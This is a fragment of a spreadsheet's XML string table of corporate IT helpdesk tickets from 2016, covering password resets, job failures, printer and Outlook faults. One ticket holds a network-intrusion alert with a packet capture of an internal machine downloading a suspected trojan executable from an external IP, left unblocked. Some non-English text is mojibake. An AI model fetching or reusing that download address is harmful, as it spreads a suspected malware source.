mycompany.company.com    site not functioning for applying leave. kindly support._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>cxltnjuk hkdefraw</t>
  </si>
  <si>
    <t>HostName_66 : volume: f:\ label:dat1-HostName_66 9a625d75 is over  85% space consumed. space available: 1.27 m</t>
  </si>
  <si>
    <t>security incidents - ( #in33987594) : 29866 vid22518 bare http get executable from ip address (possible downloader)</t>
  </si>
  <si>
    <t>source ip :_x000D_
system name :_x000D_
user  name:_x000D_
location :_x000D_
sep , sms status :_x000D_
field sales user ( yes / no) :  _x000D_
dsw event log:_x000D_
-------------------------------------------------------------------------------------------------------------------_x000D_
event detail(s):_x000D_
_x000D_
event_id 417013204:_x000D_
[**] [1:21130977:10] 29866 vid22518 bare http get executable from ip address (possible downloader trojan) [**]_x000D_
[classification: none] [priority: 2] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]_x000D_
[sensor id: 602982][event id: 281895][time: 2585087487.272206]_x000D_
[xref =&gt; vid, 22518]_x000D_
[src ip: 10.1.43.79][dst ip: 94.102.53.238][sport/itype: 61007][dport/icode: 80][proto: 6]_x000D_
09/27/2016-11:39:36.272206 10.1.43.79:61007 -&gt; 94.102.53.238:80_x000D_
tcp ttl:127 tos:0x0 id:16297 iplen:20 dgmlen:119 df_x000D_
***ap*** seq: 0xfbc9dc8c ack: 0xe57c9433 win: 0x102 tcplen: 20_x000D_
==pcap s==_x000D_
=0c=00=00=00xz=eawn'=04=00w=00=00=00w=00=00=00e=00=00w?=a9@=00=7f=06=f23=0a=01+o^f5=ee=eeo=00p=fb=c9=dc=8c=e5|=943p=18=01=02=d4=3d=00=00get /~yahoo/csrsv.exe http/1.1=0d=0ahost: 94.102.53.238=0d=0aconnection: keep-alive=0d=0a=0d=0a_x000D_
==pcap e==_x000D_
_x000D_
_x000D_
[ex http_uri 9: /~yahoo/csrsv.exe]_x000D_
_x000D_
[ex http_hostname 10: 94.102.53.238]_x000D_
_x000D_
[o:security]_x000D_
_x000D_
[correlation_data]_x000D_
sep 27 06:01:47 71.80.15.0714 dhcpd[12774]: dhcpack on 10.1.43.79 to c4:8e:8f:f6:4a:e5 (lhql8516405) via eth1 relay 10.1.40.8 lease-duration 14400 (renew)_x000D_
_x000D_
lowercaseurlcorrelation : /~yahoo/csrsv.exe_x000D_
srcip : 10.1.43.79_x000D_
urlcorrelation : /~yahoo/csrsv.exe_x000D_
vendorreference : vid, 22518_x000D_
foreseeconndirection : outgoing_x000D_
refererproxycorrelationurl : null_x000D_
foreseeexternalip : 94.102.53.238_x000D_
eventtypeid : 200020003203113798_x000D_
unique_event_hash : 946134710_x000D_
ontologyid : 200020003203728796_x000D_
foreseeinternalip : 10.1.43.79_x000D_
urlpath : /~yahoo/csrsv.exe_x000D_
srchostname : lhql8516405_x000D_
inspectorruleid : 277082_x000D_
inspectoreventid : 077564517_x000D_
httpmethod : get_x000D_
netacuity_destination_organization : ecatel ltd_x000D_
vendoreventid : 281895_x000D_
device_id : 2550522_x000D_
foreseemaliciousprobability : 0.0846984_x000D_
event_summary : 29866 vid22518 bare http get executable from ip address (possible downloader trojan)_x000D_
tcpflags : ***ap***_x000D_
agentid : 102805_x000D_
srchostname : lhql8516405_x000D_
cvss : -1_x000D_
foreseedstipgeo : den dolder,nld_x000D_
devip : 10.32.100.17_x000D_
inlineaction : 2_x000D_
proto : tcp_x000D_
dstport : 80_x000D_
vendorpriority : 2_x000D_
ileatdatacenter : true_x000D_
vendorsigid : 29866_x000D_
srcport : 61007_x000D_
globalproxycorrelationurl : csrsv7_x000D_
host : 94.102.53.238_x000D_
dstip : 94.102.53.238_x000D_
source_network_type : internal_x000D_
url : 94.102.53.238/~yahoo/csrsv.exe_x000D_
urlfullpath : /~yahoo/csrsv.exe_x000D_
urlhost : 94.102.53.238_x000D_
irreceivedtime : 1474976715927_x000D_
action : not blocked_x000D_
ctainstanceid : 0_x000D_
vendorversion : 7_x000D_
httpversion : http/1.1_x000D_
logtimestamp : 2585087487_x000D_
foreseemaliciouscomment : negativeevaluationthreshold:0.0181;positiveevaluationthreshold:1;modelversion:854922;classifiertype:naivebayes;annotatorlist:action-not blocked-&gt;0.7719~0.8136|eventtypeid-200020003203113798-&gt;0.0005~0.0001|ontologyid-200020003203728796-&gt;0.0005~0.0001;evaluationmodels-&gt;nb-global-model:0.9736:0.0181;_x000D_
netacuity_destination_isp : ecatel ltd_x000D_
device_network_type : internal_x000D_
srcmacaddress : c4:8e:8f:f6:4a:e5_x000D_
sherlockruleid : 690393_x000D_
eventtypepriority : 3</t>
  </si>
  <si>
    <t>HostName_1379 : volume: c:\ label:sys-HostName_1379 28385a7b is over  85% space consumed. space available: 3.7 g</t>
  </si>
  <si>
    <t>HostName_1379 : volume: c:\ label:sys-HostName_1379 28385a7b is over _x000D_
85% space consumed. space available: 3.7 g</t>
  </si>
  <si>
    <t>hp2çƒ­åŽ‹ç‚‰æ•°æ®ä¼ è¾“å¡ï¼Œæ•°æ®æ›´æ–°ä¸å‡ºæ¥ï¼Œè¯·å¸®æˆ‘è½¬ç»™å°è´º</t>
  </si>
  <si>
    <t>basqoyjx frvwhbse</t>
  </si>
  <si>
    <t>zpononpo mp's data is incorrect.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2645 failed in job_scheduler at: 09/28/2016 03:35:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2645 failed in job_scheduler at: 09/28/2016 03:35:00</t>
  </si>
  <si>
    <t>question  -  who is taking care on report zzsdspc7?</t>
  </si>
  <si>
    <t xml:space="preserve">i've realised that 1,131 not needed customer stock buckets are not needed._x000D_
the customer order are already completed but the stock is reserved for these orders._x000D_
therefore stock will sit there for ever._x000D_
_x000D_
would you please address to the people responsible._x000D_
that would allow us to reduce stock level._x000D_
</t>
  </si>
  <si>
    <t>user creation and deletion on droracle , HostName_1317 and HostName_1316</t>
  </si>
  <si>
    <t xml:space="preserve">create users : 1. unix team  2. user with sudo privileges for trayton and neal._x000D_
server : droracle _x000D_
_x000D_
_x000D_
_x000D_
delete users : 1. markhty snyder 2. gptmrqzu muiqteyf 3. pollaurid griener _x000D_
server : HostName_1317 , HostName_1316 , droracle _x000D_
</t>
  </si>
  <si>
    <t>klopfgxd odxgmqhy</t>
  </si>
  <si>
    <t>not able to upload the engineering_tool with any or the vpn or vpn</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nmqgrkex.ldeizfrm@gmail.com_x000D_
_x000D_
[cid:image001.jpg@01SID_35982.4b39fca0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>nmqgrkex ldeizfrm</t>
  </si>
  <si>
    <t>passwort frau koburvmc jwzlebap #51117</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: mobaidfx.gviwlsrm@gmail.com_x000D_
_x000D_
hallo,_x000D_
_x000D_
frau rieÃŸ wird ab dienstag, 4. oktober wieder ihre arbeit beginnen._x000D_
_x000D_
bitte passwort neu vergeben._x000D_
_x000D_
frau rieÃŸ wird voraussichtlich von 8.00 bis 10.00 uhr im bÃ¼ro erreichbar sein._x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>bridgex from lacw8515941 - monitoring_tool robot transaction down</t>
  </si>
  <si>
    <t xml:space="preserve">bridgex from lacw8515941 - monitoring_tool robot transaction down_x000D_
_x000D_
"copy of netperfmon event log : transaction 'bridgex from lacw8515941' is down. reason: step 'uploading excel file step 2' failed: element 'file upload field' was not found" action was executed successfully _x000D_
_x000D_
_x000D_
hi team,_x000D_
_x000D_
we got the above alert in monitoring_tool, checked with basis team and there is no issues from their side._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>GRP_60</t>
  </si>
  <si>
    <t>both the numbers for gso are not working.</t>
  </si>
  <si>
    <t>both the numbers for gso are not working._x000D_
germany : (49) 6003-827-7333_x000D_
usa : (1) 724-539-5226 or 800-848-1135 _x000D_
_x000D_
calls are landing on the phones but caller can not hear anything._x000D_
communication is one way. (agent can hear but not caller)</t>
  </si>
  <si>
    <t>network outage : kingston pa site is down since 2:10 am et on 09/28.</t>
  </si>
  <si>
    <t>what type of outage:  _x____network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _____no____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _________2:10 am et on 09/28._____________x000D_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___na_____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _____noi____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</si>
  <si>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printer prtsg004</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: bcxpeuko.utorqehx@gmail.com_x000D_
_x000D_
hello team,_x000D_
please help me to confirm printer prtsg004 as we are not able to configure from our side._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>erp access issue p 11, passwort zurÃ¼ck setzen</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): p 11_x000D_
_x000D_
enter user id of user having the issue: reisenkostenabrechnung nicht mÃ¶glich, da zu viele falsche anmeldungen, bitte passwort zurÃ¼ck setzen. danke _x000D_
_x000D_
transaction code(s) the user needs or was working with:_x000D_
_x000D_
describe the issue:_x000D_
_x000D_
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000D_
_x000D_
provide access the same as this other user:</t>
  </si>
  <si>
    <t>ukqoiswv unjarfoq</t>
  </si>
  <si>
    <t>reactivate ruenzm - it is our ceo (usa - deloro group) - it is urgent</t>
  </si>
  <si>
    <t>outlook - indizierung</t>
  </si>
  <si>
    <t>ich kann seit ca. 1 woche meine suche im outlook nicht verwenden, da der hinweis "ihre elemente werden zurzeit von outlook indiziert" erscheint._x000D_
habe auch meinen pc, mit geÃ¶ffnetem outlook, Ã¼bers wochenende laufen lassen, doch bisher immer das gleiche._x000D_
aktuell mÃ¼ssen noch 10.809 elemente indiziert werden._x000D_
gestern waren es ca. 2.500 elemente._x000D_
ich habe somit massive probleme, da ich mails von vor einem jahr bis jetzt mit der suchfunkton nicht finden kann.</t>
  </si>
  <si>
    <t>qjsydrfo oeicyswt</t>
  </si>
  <si>
    <t>unlock erp account (user id: murakt)</t>
  </si>
  <si>
    <t>please unlock my erp account (user id: murakt)</t>
  </si>
  <si>
    <t>knpodsal pzdkcimf</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3186 failed in job_scheduler at: 09/28/2016 00:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3186 failed in job_scheduler at: 09/28/2016 00:02:00</t>
  </si>
  <si>
    <t>login blocked</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ublisodp.qydfvpgw@gmail.com_x000D_
_x000D_
hello_x000D_
_x000D_
i am not able to login to business_client due to wrong password._x000D_
pl unblock and let me know the existing password to reset the same with new password._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>out look is not opening</t>
  </si>
  <si>
    <t>out look is not opening , showing error message couldn't able to access mail</t>
  </si>
  <si>
    <t>kzybxher prjaswhe</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to ess protel </t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to ess portal </t>
  </si>
  <si>
    <t>svmkobqj sgqtdubv</t>
  </si>
  <si>
    <t>zgmdster bdvcealj</t>
  </si>
  <si>
    <t>reset passwords for knemilvx dvqtziya using password_management_tool password reset.</t>
  </si>
  <si>
    <t>jtwykasf elkhcjqn</t>
  </si>
  <si>
    <t>atp for mm 4870517 issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qgrbdnoc.dgupnhxv@gmail.com_x000D_
_x000D_
hello,sirs_x000D_
_x000D_
we had a schedule agreement 4111336752 about mm 4870517*720pcs which request delivery time is in 10/11, and the stocks can meet our agreement, but in 9/23, there is 35050345 4870517*4280pcs created in plant_283, and then it took our all current plant_283 stock, and only confirmed us 700pcs as below which cannot meet the customer's demand , so we want to check what is the current rule about the confirm date, why the stock meet the back order not the previous order?_x000D_
[cid:image001.png@01SID_35977.b52c2ee0]_x000D_
</t>
  </si>
  <si>
    <t>qgrbdnoc dgupnhxv</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_HostName_768_inc failed in job_scheduler at: 09/27/2016 22:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_HostName_768_inc failed in job_scheduler at: 09/27/2016 22:36:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_56filesys failed in job_scheduler at: 09/27/2016 22:25:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_56filesys failed in job_scheduler at: 09/27/2016 22:25:00</t>
  </si>
  <si>
    <t>ba02 printer still keep printing some error task_please help</t>
  </si>
  <si>
    <t xml:space="preserve">we've faced the problem ie.  the printer ba02 do keep printing the job which is wrongly assigned by some user (vvkujup).  we turned off the printer and lan by yesterday evening , and turn-on printer and plug lan this morning, however the printer do still printing such jobs.  as checked with local printer team, he suggested to change ip address at ba02 as attached .  please help us stop such error printing and advise back to us aerp., </t>
  </si>
  <si>
    <t>erp-mae windows ad account is locked.</t>
  </si>
  <si>
    <t>erp-mae ad account is locked and hana production jobs are failing. unlock immediately and share the root-cause._x000D_
please assign to safrgyynjit or team and reach them immediately on call.</t>
  </si>
  <si>
    <t>petgvwch zevpkogu</t>
  </si>
  <si>
    <t>ask zwip report</t>
  </si>
  <si>
    <t xml:space="preserve">when i sae the zwip report. the sales order35049170 / 060 is not shown customer and sales order as well_x000D_
please, check the reason and let me know how to show above information in zwip._x000D_
 - plant : plant_68_x000D_
 - prodcution order : 226043035 </t>
  </si>
  <si>
    <t>zcqnuawo zxdtskpw</t>
  </si>
  <si>
    <t>win8.1 ç³»ç»Ÿæç¤ºæ›´æ–°åŽï¼Œæ‰€æœ‰åº”ç”¨è½¯ä»¶éƒ½ä¸èƒ½æ‰“å¼€ã€‚</t>
  </si>
  <si>
    <t>bxtdalsj rnkvcshb</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3186 failed in job_scheduler at: 09/27/2016 20:49:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3186 failed in job_scheduler at: 09/27/2016 20:49:00</t>
  </si>
  <si>
    <t>metal cutting technology p/l (company zqt 2005137185</t>
  </si>
  <si>
    <t xml:space="preserve">hi team,_x000D_
_x000D_
i have created the attached quote, however, it is not up showing correctly (see attached). can you please fix this as soon as possible? </t>
  </si>
  <si>
    <t>ç”¨å‹-åº“å­˜å¸å’ŒçŽ°å­˜é‡ä¸ç¬¦</t>
  </si>
  <si>
    <t>ç”¨å‹-åº“å­˜å¸å’ŒçŽ°å­˜é‡ä¸ç¬¦ï¼Œäº§å“ç¼–ç ï¼š112001960200ï¼Œåº“å­˜å°è´¦15kgï¼ŒçŽ°å­˜é‡75kg</t>
  </si>
  <si>
    <t>qypsxviu xagqtblv</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3186 failed in job_scheduler at: 09/27/2016 20:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3186 failed in job_scheduler at: 09/27/2016 20:00:00</t>
  </si>
  <si>
    <t>download issue</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: uezonywf.rldbvipu@gmail.com
i am trying to download the software to do tooling reports on my company dell 2 in 1 and i keep getting error messages. i assume someone will have to take remote access of my computer to see what is going on.
tommyth duyhurmont
channel partner sales engineer
company inc.
uezonywf.rldbvipu@gmail.com&lt;mailto:uezonywf.rldbvipu@gmail.com&gt;
www.company.com&lt;
www.company.com/engineering_tool/en/home.html
[
</t>
  </si>
  <si>
    <t>i have another shipment that will not process</t>
  </si>
  <si>
    <t>commodity details error the same as inc1552879 _x000D_
dn 9169306896_x000D_
sto 5019278106_x000D_
this consignment is urgent so can it be resolved quickly please?</t>
  </si>
  <si>
    <t>cannot connect</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vjuxfokc.cwhxnoug@gmail.com_x000D_
_x000D_
for some reason i cannot connect to the vpn?_x000D_
i have tried my usual username and password but it is not working?_x000D_
_x000D_
_x000D_
[cid:image005.jpg@01SID_3595f.59714a30]_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>vjuxfokc cwhxnoug</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1142 failed in job_scheduler at: 09/27/2016 18:05:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1142 failed in job_scheduler at: 09/27/2016 18:05:00</t>
  </si>
  <si>
    <t>user getting prompt to upgrade java.</t>
  </si>
  <si>
    <t>user getting prompt to upgrade java._x000D_
-connected to the user system using teamviewer._x000D_
-advised the user to complete the installation._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>erp business workplace inbox is not working</t>
  </si>
  <si>
    <t>erp inbox for smitrtgcj1 is not working.  i have created a background report to run and deliver to my erp inbox but it is not delivering.  
i have also tried to create a mail thru the erp inbox and send to myself and i get the error erp user &lt;christgry smhdyhti&gt; does not exist even though i show up in the soplant_49 transaction.</t>
  </si>
  <si>
    <t>pdokqgrn bqkpaxcm</t>
  </si>
  <si>
    <t>custom quote.  at saving receive error message of "enter rate/usd rate type m for 9/27 in the system settings</t>
  </si>
  <si>
    <t>name:lagqcompanyo xqtldrcs
language:
browser:microsoft internet explorer
email:lagqcompanyo.xqtldrcs@gmail.com
customer number:
telephone:
summary:custom quote.  at saving receive error message of "enter rate/usd rate type m for 9/27 in the system settings
=====see attachment ====================</t>
  </si>
  <si>
    <t>1.) briefly describe what you were trying to do and the issue you have encountered._x000D_
i am trying to access material drawings but am getting an error message when i log in (see attached)_x000D_
2.) please include a screenshot of any error messages</t>
  </si>
  <si>
    <t>xzvqgodj arqcuvim</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1129conf_s failed in job_scheduler at: 09/27/2016 16:40:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1129conf_s failed in job_scheduler at: 09/27/2016 16:40:00</t>
  </si>
  <si>
    <t>can you reset my password for SID_37</t>
  </si>
  <si>
    <t>name:fybwjzhx ojgrpafb
language:
browser:microsoft internet explorer
email:fybwjzhx.ojgrpafb@gmail.com
customer number:
telephone:
summary:can you reset my password for SID_37</t>
  </si>
  <si>
    <t>fybwjzhx ojgrpafb</t>
  </si>
  <si>
    <t>reset the password for fueiklyv jargqpkm on erp / production / bw</t>
  </si>
  <si>
    <t>please reset my password</t>
  </si>
  <si>
    <t>i installed the analysis for microsoft excel in erp business intelligence and i am getting an error message</t>
  </si>
  <si>
    <t>i am able to open the analysis for microsoft excel but when i click on log in to erp business objects i get an error message that says "the launcher is exited with error, see log file for more details.  the analysis add-in is not registered correctly."  when i click on logfile folder, i get a dialog box that ways "windows can't open this file: file: launcher_log_8056.glf" and asked me to find the programdnty to open the file.</t>
  </si>
  <si>
    <t xml:space="preserve">channel management claim issue </t>
  </si>
  <si>
    <t>claim 845354 is approved but is not showing up in settlement list.  can not get credit to generate.  
also can not reject in order to create a new claim.   i created a new claim to replace but have concerns with proceeding to process if i cant  reject the first - 
please advise, as we owe the customer their credit.   new claim 845691</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1146a failed in job_scheduler at: 09/27/2016 16:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1146a failed in job_scheduler at: 09/27/2016 16:00:00</t>
  </si>
  <si>
    <t>dvncgqek skvcrebq</t>
  </si>
  <si>
    <t>crm addin boxes dont stay checked</t>
  </si>
  <si>
    <t>gso please reach out to lryturhy to correct his addin issue. after rechecking his crm addin boxes and closing outlook, they become unchecked again and the addin portion of the ribbon dierppears.</t>
  </si>
  <si>
    <t>expense report blocked</t>
  </si>
  <si>
    <t>cqlehowf aosqelnr</t>
  </si>
  <si>
    <t>working on the fax lines in usa to see if we can do them without having to order any parts</t>
  </si>
  <si>
    <t>outlook not working, was ok this morning, but will not let me back in now</t>
  </si>
  <si>
    <t xml:space="preserve">outlook down
wlhxrogv yawtxuod </t>
  </si>
  <si>
    <t>working on getting his new laptop ready for him</t>
  </si>
  <si>
    <t>zjihgovn cqxahony</t>
  </si>
  <si>
    <t>tkflbvim smwqzfgc</t>
  </si>
  <si>
    <t>business objects analysis errors</t>
  </si>
  <si>
    <t xml:space="preserve">i recently changed my work computer from an 8gb "business" model to a 16gb "engineering" model. i frequently use business objects analysis for excel. when opening files that i have saved that use data connections, i am running into an error that prompts me to try and "migrate" the connection from odbc to http. see attached error. because i am not familiar with this, i cannot refresh data on old workbooks. can someone assist? </t>
  </si>
  <si>
    <t>login issue_x000D_
-verified user details.(employee# &amp; manager name)_x000D_
-checked the user name in ad unlocked the account._x000D_
-advised the user to login and check._x000D_
-caller confirmed that he was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3194 failed in job_scheduler at: 09/27/2016 14:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3194 failed in job_scheduler at: 09/27/2016 14:15:00</t>
  </si>
  <si>
    <t>(srvlavpwdrprd01.company.company.com) is not responding, this is our calibration system, need up aerp</t>
  </si>
  <si>
    <t>GRP_61</t>
  </si>
  <si>
    <t>netweaver access</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: oqvwgnkc.gkjylpzx@gmail.com_x000D_
_x000D_
hello.   can someone help me with netweaver access?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>oqvwgnkc gkjylpzx</t>
  </si>
  <si>
    <t>i tried using my windows login password but it is not working.</t>
  </si>
  <si>
    <t xml:space="preserve">skype certificate error </t>
  </si>
  <si>
    <t>skype certificate error</t>
  </si>
  <si>
    <t>rstjupxe yjlgsiah</t>
  </si>
  <si>
    <t xml:space="preserve">dealer open orders are appearing in vkm4 </t>
  </si>
  <si>
    <t xml:space="preserve">hi,
please raise it ticket. all dealer open orders are appearing in vkm4 â€“ credit check even though the credit utilization is within the limits. this started after changing the credit terms as z060 to all open orders.
gajthyana hegdergyt
manager- finance
miecoszw.mhvbnodw@gmail.com 
for technical assistance:  / in.techsupport@company.com 
</t>
  </si>
  <si>
    <t>miecoszw mhvbnodw</t>
  </si>
  <si>
    <t>client 0819 company, inc / rejected edi inwarehouse_tool # 0006475468</t>
  </si>
  <si>
    <t xml:space="preserve">from: nihtykki mcgyuouald  
sent: tuesday, september 27, 2016 8:50 pm
to: nwfodmhc exurcwkm
subject: amar fw: client 0819 company, inc / rejected edi inwarehouse_tool # 1117586579
hello,
please check into the below edi file to see why it was rejected from our system.  they have provided the technical support below.
</t>
  </si>
  <si>
    <t>GRP_32</t>
  </si>
  <si>
    <t>pr - workflow</t>
  </si>
  <si>
    <t xml:space="preserve">from: grhryueg dewicrth 
sent: tuesday, september 27, 2016 7:37 pm
to: nwfodmhc exurcwkm
subject: amar fw: pr - workflow
hello it help,
can you help â€“ please see the image in the email below â€“ there is a workflow that i need to process but it will not give me an approve or reject option and will not pull up the details in the portal.
i am also accessing it from outside of company as i am traveling for work.
</t>
  </si>
  <si>
    <t>new laptop setup</t>
  </si>
  <si>
    <t>help to create and configure the user login profile and  outlook.</t>
  </si>
  <si>
    <t>ticket update on inplant_864352</t>
  </si>
  <si>
    <t>unable to view data in distributor_tool account</t>
  </si>
  <si>
    <t>csotmdiw yfeqcbti</t>
  </si>
  <si>
    <t>dock station- telephony_software ip phone</t>
  </si>
  <si>
    <t>request for install the dock station and ip phone for the telephony_software application</t>
  </si>
  <si>
    <t>the termination action for johhdyanna kadyuiluza has completed.</t>
  </si>
  <si>
    <t xml:space="preserve">hello , 
a termination for johhdyanna kadyuiluza, 2111165258, effective 09.09.2016 has been approved. 
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1129conf_s failed in job_scheduler at: 09/27/2016 12:40:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1129conf_s failed in job_scheduler at: 09/27/2016 12:40:00</t>
  </si>
  <si>
    <t>vpn connectivity is too slow</t>
  </si>
  <si>
    <t>vpn disconnecting</t>
  </si>
  <si>
    <t>hjxtczwo wdrxmtqg</t>
  </si>
  <si>
    <t>erp-mae id seems to be locked in hana SID_60</t>
  </si>
  <si>
    <t>erp-mae id seems to be locked in hana SID_60
request for unlock.</t>
  </si>
  <si>
    <t>name:xernsfqa uzvsnlbd
language:
browser:microsoft internet explorer
email:xernsfqa.uzvsnlbd@gmail.com
customer number:
telephone:
summary:i am receiving error messages when trying to update my printer drivers. i'm unable to print to the printers i need to utilize, dg16 and dg10.</t>
  </si>
  <si>
    <t>my outlook will not work on my computer. this was since my password change. it works on my phone but not my laptop.</t>
  </si>
  <si>
    <t>bsxvtpke vbfcashd
cell 
system affected is dell laptop --outlook</t>
  </si>
  <si>
    <t>bsxvtpke vbfcashd</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1142 failed in job_scheduler at: 09/27/2016 12:05:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1142 failed in job_scheduler at: 09/27/2016 12:05:00</t>
  </si>
  <si>
    <t>unable to connect to company secure in usa</t>
  </si>
  <si>
    <t>horzelqj ujyzldmh</t>
  </si>
  <si>
    <t xml:space="preserve">update on ticket_no1555136 </t>
  </si>
  <si>
    <t>name:dfgtyon stasrty
language:
browser:microsoft internet explorer
email:vsbtygin.oufhtbas@gmail.com
customer number:
telephone:
summary:can we get this ticket ticket_no1555136 completed today?  i need to be able to get this site up.  thank u</t>
  </si>
  <si>
    <t>ticket update on inplant_864348</t>
  </si>
  <si>
    <t>inwarehouse_tools are not automatically being sent to helical when referenced to contracts</t>
  </si>
  <si>
    <t>customer 81371659, sales org 1204, have inwarehouse_tools automatically set to be emailed, this works for standard orders, zkb and zke's order types, but when an order is referenced to a contract, they are not being transmitted, the partners in the order is correct, but on the inwarehouse_tool it is the same as the sold to party.  please see attached for examples.</t>
  </si>
  <si>
    <t>vcedphrq yajdpgnz</t>
  </si>
  <si>
    <t>ticket update - inplant_862976</t>
  </si>
  <si>
    <t>SID_37 password</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: czsmnbdi.ispdhfer@gmail.com_x000D_
_x000D_
please reset my password in SID_37, see msg below._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>czsmnbdi ispdhfer</t>
  </si>
  <si>
    <t>hello, i am have problems running open sales backorder report data will not download past 9/22.</t>
  </si>
  <si>
    <t>bmixaeon mtaguhed</t>
  </si>
  <si>
    <t>programdnty zfiu0007 problem with credits not being issued on some accounts</t>
  </si>
  <si>
    <t xml:space="preserve">we have some accounts where tax is not being issued and they are coded to the reason code 250 code that is part of this job.  i have attached examples.  </t>
  </si>
  <si>
    <t>unable to set up skype meetings</t>
  </si>
  <si>
    <t>rechner ewew8323527 \bluescreen \wrcktgbd wzrgyunp</t>
  </si>
  <si>
    <t>reinstall hardkopy we_wu116 \wrcktgbd wzrgyunp</t>
  </si>
  <si>
    <t>probleme mit hp4050 \fehler 41.1 \lxvunpiz mgjxwept</t>
  </si>
  <si>
    <t>lxvunpiz mgjxwept</t>
  </si>
  <si>
    <t>rechner ewew8323612 sehr langsam .\lxvunpiz mgjxwept</t>
  </si>
  <si>
    <t>setup new ws \sgnubadl gpkovbah</t>
  </si>
  <si>
    <t>sgnubadl gpkovbah</t>
  </si>
  <si>
    <t>unable to connect to tc78 and tc19</t>
  </si>
  <si>
    <t>arjpdohf mrqwdtil</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 password reset done. </t>
  </si>
  <si>
    <t>upcajlmd uqsbmiea</t>
  </si>
  <si>
    <t>keqldvig hmiyeobl</t>
  </si>
  <si>
    <t>reset passsw erp SID_34 - user: almrgtyeiba</t>
  </si>
  <si>
    <t>hi team,_x000D_
_x000D_
could you please reset passw the erp SID_34 user: almrgtyeiba (gvtbduyf gdblxiva) only erp._x000D_
_x000D_
tnks</t>
  </si>
  <si>
    <t>unable to launch outlook after resetting the password</t>
  </si>
  <si>
    <t>crm plugin not responding</t>
  </si>
  <si>
    <t>urgent: crm mailbox is not synchronising</t>
  </si>
  <si>
    <t>urgent: crm mailbox is not synchronising. got a call from vitalyst. they've checked the crm sync settings and say that everything is in order. however, the crm mailbox is not synching. not accepting the username password too._x000D_
_x000D_
phone: 214 70sartlgeo lhqksbdx617</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</si>
  <si>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hr14 on HostName_769_x000D_
 _x000D_
   â€¢  detailed description of the problem ? keeps asking for a driver install but will not install driver update_x000D_
_x000D_
   â€¢  type of documents not printing?  all tried_x000D_
   _x000D_
_x000D_
   â€¢  what system or application being used at time of the problem?      windows_x000D_
_x000D_
   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed? turned off and on printer_x000D_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</si>
  <si>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owhuxbnf sxbgyrou</t>
  </si>
  <si>
    <t>unable to get the crm app on outlook</t>
  </si>
  <si>
    <t>termination for user lisfgta geitrhybler</t>
  </si>
  <si>
    <t xml:space="preserve">termination for user lisfgta geitrhybler
hello , 
a kÃ¼ndigung for liuytre geiÃŸler, 2111761255, effective 16.09.2016 has been approved. 
click the link to view. 
</t>
  </si>
  <si>
    <t>pls reset windows password for user vvkertgipn</t>
  </si>
  <si>
    <t>employee termination foulgnmdia pgsqwrumh langmar</t>
  </si>
  <si>
    <t xml:space="preserve">hello , 
